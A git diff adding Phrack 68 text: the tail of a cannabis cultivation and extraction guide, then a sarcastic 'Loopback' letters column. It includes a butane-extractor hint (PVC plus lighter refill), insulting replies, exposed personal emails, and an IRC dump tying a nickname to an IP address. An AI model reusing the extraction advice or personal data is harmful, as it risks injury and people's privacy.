+Creasing and snapping branches are a form of "supercropping", and they
+combine the benefits of topping and bending. The idea is to break the inner
+part of a branch while keeping it attached to the plant. Lke topping, this
+causes a merging of the vascular system, and this section of branch later
+on will grow into a nice bulge. And like bending, the top nodes are pushed
+outward to allow more light to hit nodes underneath. It is usually best to
+bandage the plant after supercropping until it has completely healed since
+this technique can cause a good deal of damage to the plant if left
+unattended. It's usually best to delay flowering for a couple of weeks
+after supercropping to allow the plant to fully heal and build support for
+those super dank buds it'll be growing.
+
+
+0x0A: Flowering
+
+Once your plant has reached the desired size, it's time for flowering.
+Unless you're growing an autoflowering variety, the flowering cycle is
+typically triggered by a change in nighttime length, and most often a
+12-hour day/12-hour night cycle is used. Some plants will grow considerably
+during the flowering phase, especially the African Sativas, so keep this in
+mind; you don't want to trim the plant once it's in full flower production
+as this causes considerable stress and can cause the female to produce some
+seeds.
+
+For the first couple weeks of flowering, convert about half of your
+nutrient solution from the veg mix to the flower mix. Convert more to
+flowering as time passes. After 2-3 weeks, a pure flowering mix should be
+used. Once the mass of pistils have formed, increase the nutrient
+concentration. Large, dense buds will develop, and some leaves may yellow
+and drop. Toward the end of the cycle, pistils will change color (often
+from white to orange/brown), and from here on consider flushing with plain
+water. Flushing leaches leftover fertilizer from inside the plant, giving
+it a much smoother burn. Plants that are harvested without flushing
+typically will have harsh smoke, even after curing.
+
+At the end of the flowering phase, the crystals on the buds, pistils,
+leaves, and stems will first turn milky-white. After this, they begin to
+brown. This is when they are ready to pick. Picking later will bring out
+more of the Indica characteristics (more CBD/CBN), whereas picking earlier
+will bring out more of the Sativa characteristics (more THC). Picking too
+early, however, (before crystals have become milky-white) produces weak
+buds, and often will just give you a headache when smoked.
+
+If after flushing the crystals do not appear to change color, feed them
+once more, with a full, strong solution, then continue flushing.
+Additional buds will likely grow, and they will be ready soon after.
+
+
+0x0B: Harvest
+
+Harvest the plants by cutting at the base, then hang them upside-down (I
+dare you to try hanging them right-side up....good luck) in a dark room to
+dry. A small amount of airflow is necessary, so keep a fan on low but not
+pointed directly at the plants. After at least one day of full darkness,
+you can begin trimming. Trim off all the largest leaf first, leaving the
+smaller, hashy leaves for manicuring later. If this trim does not have
+crystals/hash on it, discard it, otherwise save for extracts.
+
+Manicuring is a bit of a longer process. You can go the quick route, and
+just trim the ends of the leaves sticking out like so many lazy-ass growers
+do, or you can properly manicure your buds, making them look better and
+preventing you from smoking all that leaf matter. To manicure, use a pair
+of floral trimmers to reach in and cut the leaves at the base of the stem.
+This is uaully easier then holding the buds upside down since the leaves
+are below the buds. It takes practice and patience to avoid clipping off
+whole buds, but even if you do just save them along with the other
+manicured buds. After the leaf is clipped off, remove excess stem.  If the
+stems fold when you try to break them, the buds are not dry yet; place them
+in a brown paper bag for further drying. Once they snap, place them in
+glass jars for curing. Also, save all the trim from manicuring for making
+extracts. You can place it in a ziploc bag and put it in the freezer until
+you're ready to make extracts.
+
+Check on the glass jars once a day. Open each jar, and take a whiff. You'll
+notice over time how the smell changes. Check out the buds. Try snapping a
+stem. If it folds, either put the buds back in a paper bag, or keep the jar
+open a bit longer. For a quick, 2-week cure, keep jars open 15-60 minutes
+per day depending on dryness. If buds are dry, don't leave the jar open too
+long, but open it at least once a day to allow the air inside to exchange.
+
+During the curing process, chemicals inside the buds break down, mainly
+those that cause harsh smoke. The longer the cure, the smoother the smoke
+is, but I can't say that anything longer than 8 weeks really makes a
+difference. Once the buds smell like they have cured, try smoking it.
+Continue the curing process until the smoke is smooth and clean.
+
+
+0x0C: Extracts
+
+Now here's the fun part. Personally, I like making kief, hash, and baked
+goods. Butane extracts are also pretty easy. I won't go into detail on
+those, but making a butane extractor with PVC and a lighter refill can is
+simple, and there are plenty of guides available online.
+
+If you want to make butter or oil for cooking, you can use kief or hash
+you've already made and not worry about filtering, or you can use the trim
+in its entirety. If using trim, fill a pot with the amount of butter or oil
+you want to make. Add just enough water to the pot so that it won't splash
+or boil over, but otherwise more water doesn't hurt. Mix it all together,
+and add the trimmings. Simmer the mixture for a minimum of 2 hours and up
+to 24 hours -- I definitely notice a difference between 2 and 24, but I
+can't say where the threshold is in between. After it's done cooking,
+transfer the mixture through a strainer into another pot or bowl, and place
+this into the refrigerator. The oil or butter (along with the good stuff)
+will rise to the top, and the water will sit at the bottom. Since THC and
+the other chemicals are oil- but not water-soluble, none of it should be
+lost in the water. If the oil hasn't solidified at all, placing it in the
+freezer for a little while should do the trick (too long and the water will
+freeze). Scoop out the oil or butter, and use for baking, or spread on
+toast!
+
+Making water hash is pretty easy. Get yourself a set of extract bags
+(minimum 3) including at least either a 73-ish or 90-ish micron bag. In a
+set of 3 the others should be around 25 microns and at least 180 microns.
+Place each bag, smallest first, into a bucket, and fill the bucket with
+ice-water. Add the trim, and mix for 15-20 minutes with a kitchen or paint
+mixer. Let the mixture settle for about half an hour, then remove each bag
+one at a time. The first will remove the trim, and others after will have
+hash and/or contaminants, depending on how many bags you use. If the set
+comes with a screen, use the screen to press the water out of each mass of
+hash. Scrape the hash off and set aside to dry.
+
+Even easier than water hash is what I like to call white-trash hash. What
+comes out is really kief, but you can press the kief into hash if you want.
+Procure a large container, like a storage bin for a shelf. One with fairly
+high walls is good so it captures as much of the mess as possible. Take
+your 73-micron bag, and put your trim inside. Fill the rest of the bag with
+broken-up dry ice. Tie the bag off (hold it closed), and shake into the
+container until all the glorious beauty falls out. You may want to split
+into multiple sessions, the first being more pure and second-grade after
+that, but I usually just shake until it looks like it's all out.  What you
+end up with in the bag is a green, sloppy mush that you can go ahead and
+discard. The bin, however, is now full of wonderful kief.  Smoke it now, or
+save it for later. Press a chunk into hash between your palms, or put some
+in a baggie in your shoe and walk on it until it turns into hash.
+
+
+0x0D: Signs and Symptoms
+
+I've saved the worst for last. Here are different signs and symptoms of
+various problems you may encounter.
+
+Perfect: The sign of perfection is perky plants, solid to deep-green
+colored (but not too dark). Leaves point upward at a 40-60 degree angle and
+toward the light. Daily growth is visible. Pistils are perky but not
+crooked at the ends.
+
+Over-watering: leaves will curl downward, with the middle section being the
+highest, kind of like it's trying to be an umbrella. Wait as long as
+possible before watering again, and make sure to provide at least a mild
+nutrient solution especially if straight water was used at the previous
+watering.
+
+Under-watering: Can be similar to heat stress when it occurs frequently,
+but otherwise the leaves will lose perkiness and wilt, lying beside the
+stem and pointing downward. Pistils first show signs with crooked ends, and
+soon after they shrivel and change color. Make sure to fully soak the
+container after this occurs, the best way being a slow flow of water rather
+than gushing out of a watering can.
+
+Heat-stress: Leaves fold up and inward, especially at the edges. Fix by
+moving the light further away or reducing the temperature. Supplement with
+extra air flow and a small extra watering (straight water is usually best
+for this to prevent nutrient burn when coupled with heat stress).
+
+Nitrogen deficiency: Leaves yellow to light-green. Treat by increasing
+concentration of veg mix.
+
+Nitrogen toxicity: Leaves very dark green, later start burning. Treat by
+reducing the concentration of veg mix.
+
+Phosphorus toxicity: Leaves dark green (purple tint sometimes) and wilt,
+curling downward. Treat by reducing the concentration of flowering mix.
+
+Various toxicities, deficiencies, pH burn: Chlorosis (dying plant matter)
+on various parts of leaves. Different styles signifiy different problems,
+but overall consider what changes have been made recently. Check pH of
+nutrient solution. Fix by flushing medium with a mild nutrient solution at
+proper pH. Avoid using supplements, just use a basic nutrient mix for the
+current phase. Treat a suspected deficiency with only a slight increase in
+what you think is needed. More often than not micronutrient dificiencies
+are only present when using synthetic nutrients and only when not using any
+other supplements. Mild deficiencies are not likely to show visible
+symptoms.
+
+Bugs!  Many different bugs will want to eat your plants. Some of the most
+annoying are aphids and spider mites. Insecticidal soap works well with
+aphids, and neem oil works extremely well with spider mites. For aphids,
+spray on site.  Most soaps take care of them well. Also consider removing
+infected plant matter. For mites, spray thoroughly and afterward remove
+leaves with noticeable spots since these 90%+ of the time have eggs. Neem
+will kill the mites but not the eggs. Spray again 2-3 days later and again
+a week after the first. Afterward, inspect daily and spray as needed.
+Grasshoppers eat the leaves. Sorry Mr. Grasshopper, but you gotta die. Pick
+them off and get rid of them however you choose.  Caterpillars eat
+everything, especially the buds. Inspect dying bud matter for caterpillars,
+and remove those found. Spray with a Bt solution -- it's a bacteria that
+when eaten causes the caterpillars to stop eating.  These methods are all
+organic (or available as organic). Use synthetic pesticides only in severe
+cases, and only before buds begin forming. Both the insecticidal soap and
+neem oil can be washed and rinsed off with regular soap at harvest if
+necessary.
+
+Mold!  Mold sucks. Bud mold is highly infective and destructive. Bud mold
+is characterized by grey/black along the stem and spreads quickly. Remove
+entire affected plants immediately. Place in quarantine until sure of the
+diagnosis, then destroy any infected plants.  Powdery mildew is annoying
+but treatable. It is easy to spot -- visible white spots with a powdery
+look on top of leaves. Treat by spraying with a baking soda solution and
+increasing air flow. Decrease humidity for up to a week after symptoms
+disappear if possible.
+
+
+0xFF - Fin
+
+That concludes this guide. I hope you've enjoyed reading it, and I hope
+you're now ready to grow some super ultra dank megabuds.
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack68/5.txt b/phrack68/5.txt
new file mode 100644
index 0000000..f8a3ea5
--- /dev/null
+++ b/phrack68/5.txt
@@ -0,0 +1,1512 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x05 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=------------------------=[  L O O P B A C K  ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[  Phrack Staff  ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+    Hi there!
+
+The least we could say is that p67 caught the attention of a lot of people.
+We got a very good feedback both IRL, on IRC and through the comments on 
+the website. Good. As you will soon find out, we had quite a bunch of
+(un)interesting mails this year which we would like to share obviously ;>
+Before going further, a quote from the last loopback is necessary:
+
+                                 ---
+We humbly apologize to all guys we never answered to neither by mail nor
+through this phile because we suck at filtering our spam (this could
+_absolutely_ not be a laziness issue, right?)
+                                 ---
+
+That said, we have to thank all the people that (un)voluntarily sent their
+contributions, whatever these were.
+
+As you will see, a polemic started with the release of the last scene phile
+as several people felt a bit disappointed (to say the least) by the 
+description of the gr33k scene.
+
+So let's explain a few things about the context of its writing:
+    - The writing itself is small and oriented because the authors didn't
+    have the time to do better.
+    - We (the phrack staff) are the ones who asked them for such a phile
+    and being in a hurry we couldn't give more than a couple of weeks to
+    the authors. Clearly they *SAVED* our sorry ass and they did it for
+    you, the community. Sincere apologies of the staff if this was not good
+    enough.
+    - (Greek) people may argue that the description was not accurate itself
+    but as you can remember, it was written with the idea of being
+    completed in this release:
+
+
+            Volume 0x0e, Issue 0x43, Phile #0x10 of 0x10
+                                 ---
+In this brief article we will attempt to give an overview of the current 
+state of the Greek computer underground scene. However, since the strictly
+underground scene in Greece is very small, we will also include some
+information about other active IT security related groups and forums. There
+is a going to be a second part to this article at a future issue in which 
+we will present in detail the past of the underground Greek scene in all 
+its gory glory.                  ---
+
+And they kept their promise with the help of some notorious big shots
+of the greek hacking scene.
+
+To the bunch of losers/masturbating monkeys who are still complaining:
+
+                                 /"\
+                                |\./|
+                                |   |
+                                |   |
+                                |>~<|
+                                |   |
+                             /'\|   |/'\..
+                         /~\|   |   |   | \
+                        |   =[@]=   |   |  \
+                        |   |   |   |   |   \
+                        | ~   ~   ~   ~ |`   )
+                        |                   /
+                         \                 /
+                          \               /
+                           \    _____    /
+                            |--//''`\--|
+                            | (( +==)) |
+                            |--\_|_//--|
+
+
+Don't worry, we published your side of the story as well. And now is time 
+for our little ... hem ... group therapy session ;-)
+
+
+                                    -- The Phrack Staff
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x00 - Phrack .VS. the social networks ]=--------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+From: Unix Root <1161967623738704101@mail.orkut.com>
+Subject: orkut - Unix Root wants you to join orkut!
+
+Unix Root wants you to join orkut.
+
+    [ Unix Root himself, seriously? ]
+
+Join now!
+http://www.orkut.co.in/Join.aspx?id=ZZZZZZZZZZZZZZ&mt=22
+
+    [ id has been replaced to protect the innocent (us) ]
+
+
+  * * *
+
+What you can do on orkut:
+  - CONNECT with friends and family using scraps and instant messaging
+  - DISCOVER new people through friends of friends and communities
+  - SHARE your videos, pictures, and passions all in one place
+
+    [ Sounds like it would change my life. ]
+
+Help Center: http://help.orkut.com/support/
+
+    [ To tell you the truth, help won't be necessary at this point :> ]
+
+                                    ---
+
+From: ***** ***** <thehackernews@gmail.com>
+Subject: Invitation to connect on LinkedIn
+
+LinkedIn
+------------
+
+
+I'd like to add you to my professional network on LinkedIn.
+
+- *****
+
+    [ What if we do not intend to do business with you? ]
+
+**** ****
+Owner at The Hacker News
+New Delhi Area, India
+
+Confirm that you know **** *****
+https://www.linkedin.com/e/xxxxxx-wwwwwwww-2h/isd/YYYYYYYYYYY/PPP_OOO/
+
+--
+(c) 2011, LinkedIn Corporation
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x01 - <?php include($teaMp0isoN) ?> ]=----------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: Poison Blog <p0isonblog@ymail.com>
+Subject: TeaMp0isoN: Issue 1
+
+My first ever zine, read it and let me know what you think. hoping it gets
+published in the next phrack magazine.
+
+    [ Hem. So basically this is a new concept: publishing a zine inside
+      another zine. And we even got 0day-hashes in the process. WIN/WIN ]
+
+- TriCk
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x02 - The usual mails  ]=-----------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+    [ Have you ever been curious about the kind of mail we are used to
+      receive? Let's have a taste. ]
+
+                                    ---
+
+From: skywalker <oyyj07@gmail.com>
+Subject: how can I get the source code
+
+hello, I found some source code in phrack Magazine, but it is attach with
+text mode, how can I get it?
+
+    [ Download the paper in "text mode". Then comment everything inside
+      that is not the code you want to compile and fire gcc.
+      It might work. If it doesn't mail nikoletaki_87@yahoo.gr for help. ]
+
+                                    ---
+
+From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
+Subject: Phrack issue 58
+
+How can i get the binary-encryption.tar.gz
+from the article Runtime binary encryption?
+
+    [ You can't; it's encrypted. I think oyyj07@gmail.com has the password.
+      You should get in touch with him. ]
+
+                                    ---
+
+From: stephane.camprasse@free.fr
+Subject: edition 64 infected by OSX:Niqtana
+
+Hello there,
+
+tar.gz of the magazine number 64 appears to be infected:
+
+http://www.sophos.com/en-us/threat-center/threat-analyses/
+viruses-and-spyware/OSX~Niqtana-A/detailed-analysis.aspx
+
+    [ Wow. Sounds like a serious issue. What should we do? ]
+
+Kind Regards
+
+Stephane Camprasse, CISSP
+
+    [ At first we wanted to laugh, then we saw you are serious business. ]
+
+                                    ---
+
+From: Domenico ****** <jmimmo82@gmail.com>
+Subject: Mailing Lists Phrack
+
+Dear Phrack Staff
+
+I would like to subscribe at mailing lists of Phrack but email
+addresses provided by the site not exist.
+
+    [ That's because there is no ML, dude. ]
+
+What do you advise me?
+
+    [ Well, keep looking. ]
+
+Best Regards
+Domenico *******
+
+                                    ---
+
+From: Robert Simmons <rsimmons0@gmail.com>
+Subject: phrack via email
+
+Do you have a mailing list that sends phrack out via email, or at least an
+email reminder to go download it?
+
+    [ We don't. What would be the point in a bloggo/twitto world where
+      information spreads that fast? ]
+
+Rob
+
+                                    ---
+
+From: Elias <thesaltysalmon@gmx.com>
+Subject: How do i subscribe?
+
+As the title says, how do i subscribe to Phrack?
+
+    [ Since you're not polite we won't accept your subscription. Don't
+      mail us again. Please. ]
+
+                                    ---
+
+From: William Mathis <scotti@uniss.it>
+Subject: One paper can change everything!
+
+    [ New submission???? :D ]
+
+What do I mean? Of course the Diploma.
+
+    [ 0wned. Deception is part of the game :-/ ]
+
+It is no secret that the knowledge, skills and experience play a crucial
+role in getting the desired position, but despite the formality when
+applying for a job essential requirement is a diploma! At the moment
+receive a diploma is very expensive, takes time and power.
+
+ORDER DIPLOMA RIGHT NOW AND RAISE THE PROFESSIONAL LEVEL, SKILLS AND
+EXPERIENCE!
+
+    [ Can we send our order in via PDF? You have to open it with
+      Acroread 9.x though, since you're only worth an 0lday to us.
+      Thank you for playing "rm me harder" w/ phrackstaff! ]
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x03 - Desperate house wifes  ]=-----------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: Luna Tix <lunatix@linuxmail.org>
+Subject: A request regarding pdf files
+
+   [ Our resident Adobe consultant is currently on holidays. We do have our
+     .txt specialists however. ]
+
+Hi,
+
+I have downloaded some adobe 3d files from a website, and need them to be
+converted into autodesk inventor ipt files.
+
+    [ You've knocked on the right door. ]
+
+Can you teach me how to do this? If yes, I can send you some of the files
+for trial, if you are successful, I am willing to pay for it.
+
+    [ Excellent! How much can you pay exactly? Our local liquor store no
+      longer accepts PDF conversion techniques in exchange for beer. ]
+
+All the best.
+
+Luna
+
+                                    ---
+
+From: sabrina <sabrina*******@gmail.com>
+Subject: don't know where to go
+
+
+hi,
+i'm in need of someone to help me in a cyber cat burglar kind of way.
+i've tried all the legal ways... police, fbi, fed trade commission all to
+busy with terrorist.
+
+    [ Now that they've caught Osama, they should have some free time. Try
+      to contact them again. ]
+
+i can go to a detective then civil lawyer but that would take way too mush
+time and an exorbitant amount of money.
+
+   [ Clearly, you've mistaken us for the cheap option. ]
+
+i need someone to find information
+on exactly where someone is located. i have email address, cell phone and
+bank account numbers ...
+
+    [ Do you have GPS coordinates? ]
+
+I'm hoping to find or at least be lead to some one who is very creative in
+using their computer. my only goal is to locate this person, i'm not out to
+steal or do any harm.
+
+    [ I know some very creative people. They compose music on their
+      computer! For realz! Would that help you? ]
+
+if you think you can help me i'll give you my phone number,  i can then
+better explain why this way for me would be the only way to go,  i lost 20
+years of my life's hard work, i just want to locate this person.
+
+    [ Wow, sorry for being so hard on you with the previous comments,
+      Sabrina. It is obvious to us now that you are clearly retarded.
+      Please leave a comment on the website with your phone number. We'll
+      get back to you. ]
+
+thank you
+sabrina
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x04 - Cooperation  ]=---------------------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: Monika ****** <monika.******@software.com.pl>
+Subject: cooperation
+
+Dear Sir or Madam
+
+    [ It's professor actually. ]
+
+My name is Monika *********. I represent Hakin 9'- IT Security magazine
+(for more details, please see our website www.hakin9.org). I would be very
+much interested in long term cooperation with your company.
+
+    [ Our company? :D ]
+
+We would co-promote our services and spread the information on IT Security
+together.
+
+    [ Well the problem is that we don't have that many services:
+        - 7-bit cleaning of ASCII papers, we are considered the market
+          leaders in this service
+        - Spam hunting with advanced regexp (i.e. matching ANTISPAM in the
+          subject)
+        - Mail storage, no backups though :(
+        - Technical review of papers when we understand them
+      See? That's not too much :-/
+      But thanks for the kind offer. PHRACK could totally use the promotion
+      of such a well established magazine as h8king (or whatever). ]
+
+ I am really looking forward to hearing from you.
+
+    [ Don't call us, we'll call you! ]
+
+ Best Regards,
+
+Monika ********
+
+Software Press
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x05 - Help is requested! (again) ]=-------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: Kevin **** <********@att.net>
+Subject: Help with Persistent BIOS Infection
+
+Hope you can help. I have a small video business and from my son's school
+flashdrive my network of computers are infected with Persistent BIOS
+Infection. My hard drive's have been rearranged with FAT segments and i
+believe is running my XP/Win7 OS's as a virtual machine.
+
+    [ Unfortunately Joanna is not part of the staff. But we have the
+      feeling that your analysis of the situation could be improved :> ]
+
+This has caused my rendering performance to be ruduced by 50%. Also when i
+make DVD's the infection is on the disc and from complants it infected
+other machines. My software is legit and i don't download anything.
+
+    [ Of course. Who does anyway? Your son perhaps :> ]
+
+I'm new (6yrs) to computers, i some what know what to do but not really.
+
+    [ So you know but you don't know. That's good, have the half of you
+      that knows guide the other half that doesn't. You can't go wrong. ]
+
+I have killed my network and now keep all computers separate but know
+somehow i will get the infection back.
+
+    [ You killed the poor network? :-/ ]
+
+Could someone make me a batch file or better yet a ISO to boot and fix my
+Bios and memory so it has Persistent BIOS Infection that is null. Giving
+back my rendering power. Making it so i can't get this infection again.
+
+   [ Just a thought: maybe if you didn't run arbitrary batch files that
+     "someone" sent you, you wouldn't have this problem in the first
+     place. But most probably that's not it. It must be a 'Persistent BIOS
+     Infection' problem. ]
+
+Maybe send me a zip file to my email address. Pleezz
+I would be more than happy to donate for the cause.
+
+    [ And yet another person willing to give us money. We should really run
+      a company :D ]
+
+Thank You
+Kevin ****
+*******@att.net
+
+                                    ---
+
+From: shashank **** <**********@gmail.com>
+Subject: hey
+
+hey,
+i was searching some hacking forums site, & found one of the "phrack
+Magazine".
+
+    [ Then you failed. It's not a forum kid :) ]
+
+It was pretty interesting. Can you help me out on how to hack Steam
+Account.
+
+    [ Do you have a paypal account? ]
+
+                                    ---
+
+From: David ***** <dfg******@yahoo.com>
+Subject: RootKit Iphone 4g
+
+Hey i was recently on your website and well i was looking for something to
+mess with my friends, see were all in the same class and we all connect to
+the same network/router thing, and you hve to login to gain acess to the
+network, so i was wondering if there was a way to control my friends
+computer with mine while were hook to the network.
+
+    [ XD ]
+
+DoFoG
+
+
+
+[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
+|--=[ 0x06 - About the scene philes ]=-----------------------------------=|
+[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
+
+
+From: Prashant KV <bug@null.co.in>
+Subject: Thank You
+
+    [ You're very welcome. ]
+
+Hi,
+I would like say thanks each and every individual in Phrack team for
+publishing our article. This will go a long way in creating awareness about
+null community.
+Thanks all....
+
+    [ And thank you for the scene phile. Always a pleasure to exchange with
+      interesting/nice people. ]
+
+                                    ---
+
+From: Hackers News <thehackernews@gmail.com>
+Subject: Article Editing
+
+    [ HEY!!! You're the guy who tried to befriend us on linkedin!!! ]
+
+Hello Sir,
+We are admin of "*The Hacker News*" : *http://www.thehackernews.com/* . We
+read an article on your Website :
+http://www.phrack.org/issues.html?issue=67&id=16#article
+I wanna ask you that on what basis you write about "*Indian Cyber Army :
+http://www.cyberarmy.in/*" .
+
+*   Fake ICA. There is yet another ICA (cyberarmy.in) which is announced as
+    fake ICA by the actual ICA group. One glance at the website content
+    tells you that there is some truth to what the actual ICA(indishell)
+    guys and other say and reminds you of the infamous plagiarism cases
+    (Ah! Any Indian h4x0r's favourite topic when they feel like bitching
+    about something :-P)*
+
+*Whatever you write is not fair and I think it represents the mistake
+done by you, that you write about a group without knowing about them,
+Read This : *
+
+*http://www.cyberarmy.in/p/about-us.html*
+
+*and I think you should 1st know about it. Hope you will edit the
+article.... as soon as possible.*
+
+    [ You may or may not be right and clearly we don't have enough
+      information to judge. For the sake of the truth and freedom of
+      speech, we are posting your comment. ]
+
+*Thanks,*
+
+    [ No prob dude. ]
+
+*Owner*
+
+*The Hacker News...*
+
+                                    ---
+
+    [ The following is a mail that we received several times between the
+      21st and the 22nd of June... As we said in the introduction, a few
+      greek people were angry because of the scene phile. Because we're
+      (not that much) bastards, we felt that these people deserved the
+      right to be published as well. So here it is...
+
+      Oh and they even pasted it in the comments! ]
+
+
+From: xak xak0r <xak3ri@hotmail.com>
+Subject: Greek Hacking Scene is alive!
+
+From: Unkn0wn <unknown.ws1@gmail.com>
+Subject: GHS - read this message
+
+From: Spyros Kous <spirou1988@hotmail.com>
+Subject: GHS for you.
+
+From: nikos piperos <piperos_22@hotmail.com>
+Subject: By <GHS>
+
+From: ****** ******* <deathlyrhymer@hotmail.com>
+Subject: greek.hacking.scene
+
+    [ Sorry, due to ASCII constraints we had to censor the name of this
+      guy :D ]
+
+From: Stephen O'Neill <apple-whore@hotmail.com>
+Subject: 0xghs
+
+    [ You've got your hex wrong dude ]
+
+From: Brian Higgins <bhiggins69@hotmail.com>
+Subject: **************************
+
+    [ Hey next time write the subject in english please :) ]
+
+From: eibhlin mcnamara <mcnamara105@hotmail.com>
+Subject: G*H*S - always here
+
+    [ A sibling of Sean maybe? ]
+
+From: nikpa pfcc <aeknik@hotmail.com>
+Subject: Greek Hacking Scene - Read your errors
+
+From: nikpa papaa <nikpa21@gmail.com>
+Subject: Greek Hacking Scene - Read your errors
+
+   [ Yeah, we ordered the lamb gyros with extra pita and tzatziki. None of
+     you guys delivered. Worst Greek Hacking Scene evar! Would not order 
+     from you again. ]
+
+From: NIKO*** *ANTAZO*OY*** <aeknik@yahoo.gr>
+Subject: Read this, about errors - GHS
+
+    [ This one had his name only partially encrypted. ]
+
+From: kondor fromGHS <kondorghs@gmail.com>
+Subject: Greek Hacking Scene
+
+    [ Hey Kevin Mitnick? :) ]
+
+Nice to see Greek Hacking Scene on Phrack, but very sad to say that there
+is no connection of all those with reality. This post represents something
+that even doesn't exist except theory.
+
+In the other hand, is not mentioned technological steps and targets that
+Greek Hacking Scene archived, not in theory, but in actions.
+
+However in the References i see nothing trust source, while you avoid posts
+on newspapers, magazines and tv about Greek Hacking Scene.
+
+Maybe Phrack can't handle the name of GHS and writing about fantasies.
+Greek Hacking Scene is not a group, team or crew etc. but is ideology of
+decades, is not about fame, but is about targets, technology and advance.
+You must know that GHS does NOT follow things such "Hackers Manifesto" and
+is well known that this person take back what he said about this manifesto
+in shake to save him from things. He even does NOT defence his ideology,
+how then we can accept such thing?! Basically we are what we create and we
+gonna call hacking what we think hacking is, you can call us as you want,
+but this can't change our actions, we not negotiate our ideology and we are
+not followers of any paid, fantasy or theory ideologies. We rage against
+machine, the system. Is good that Phrack exist cuz keep the magic to those
+who want to be related with hacking. While you keep the feeling of magic to
+your readers, we know that is all about coding, methodology and how far
+each mind can think to do things.
+
+For those who forgets, security is a part of hacking, security is not
+hacking. Hacking is every electronic violation, violation doesn't mean that
+is illegal always. As a term, hacking is every electronic violation.
+
+About Greek Hacking Scene you forget to mention a lot of groups and people
+(and is not about names) who they did things and they left lot of stuffs
+behind. Those people and groups they never care about their nicknames or
+the name of the group cuz is useless, can be any nickname or group name, at
+the end what it left, is what had created. Who make it, it doesn't matter
+really cuz those who make it as share they do it cuz they want.
+
+If is to write about things that are not related with the true and reality,
+better don't write about Greek Hacking Scene. You can write for posers and
+others who they want fame, but not for GHS. You can write fantasy, stories,
+anything you like, but as long as is not connected with reality and true,
+then don't write about Greek Hacking Scene. Maybe you can write for any
+other Greek Hacking Scene you want or you believe, but mention also that is
+not connected all those stories with Greek Hacking Scene (GREEK SENTENCE).
+
+    [ GREEK SENTENCE is something written in greek that we could not
+      translate nor write in the phile because of the greek alphabet. ]
+
+Cheers,
+
+
+Your article forgets to write about DefCon meetings that take place in
+Greece, and of course about the unique Codehack meetings that shows live
+Hacking. Or even is not mentioned things such SpyAdmin and Firehole, or
+what about Hash, Phrapes, Cdx, r00thell, hackgr and more?! What about the
+references on magazines, newspapers and tv? What about the members of Greek
+Hacking Scene that works on penetration testing companies or making atm
+softwares and banking or those who works in known computers and servers
+companies and they create technology?!
+
+About the grhack (that nobody knows) is those guys from auth that got
+hacked their servers and their pcs and tooked personal files of them?
+
+Check this link:
+http://zone-h.org/mirror/id/6638423
+
+I read slasher?! This person who has the grhack site that you took as
+reference?! With the name ********** **********?!
+
+    [ Publishing an individual's real name is against our rules. You
+      got away with it in the comment section once. ]
+
+Oh come on, i have also beautiful pictures who they poser as engineers!
+Oh now i got it! They write about their selfs! How smart... what a fame...
+what a pose!
+
+Before you write anything about Greek Hacking Scene take a look to the
+targets. We have down anarchist such indymedia sites, and also nationalist
+sites, as well he hacked into Goverment sites, political parties, national
+services, and of course all the hacking-security related greek sites who
+they offer only theory and lies that has no connection with reallity and
+hacking.
+
+And i guess so you promote the Anarchy?! So don't forget Phrack to mention
+that everything you wrote is about Anarchy, not about hacking.
+
+Greek Hacking Scene has members from all political sides and we have things
+in common we work for.
+
+This is grhack.net, this is the guy that send hopeless messages to google
+blogspot to DOWN the info that SpyAdmin post, passwords, files, everything!
+
+
+->> Slasher is nameless@155.207.206.86 (LoCo En El CoCo)
+->> Slasher is on: #grhack #anarchy
+
+
+--ChanServ-- Information for channel #grhack:
+--ChanServ--         Founder: Slasher
+--ChanServ--     Description: GR Hack - http://www.grhack.net
+--ChanServ--      Registered: Aug 05 21:36:46 2010 EEST
+
+
+--NickServ-- Information for nickname Slasher:
+--NickServ--          Realname: LoCo En El CoCo
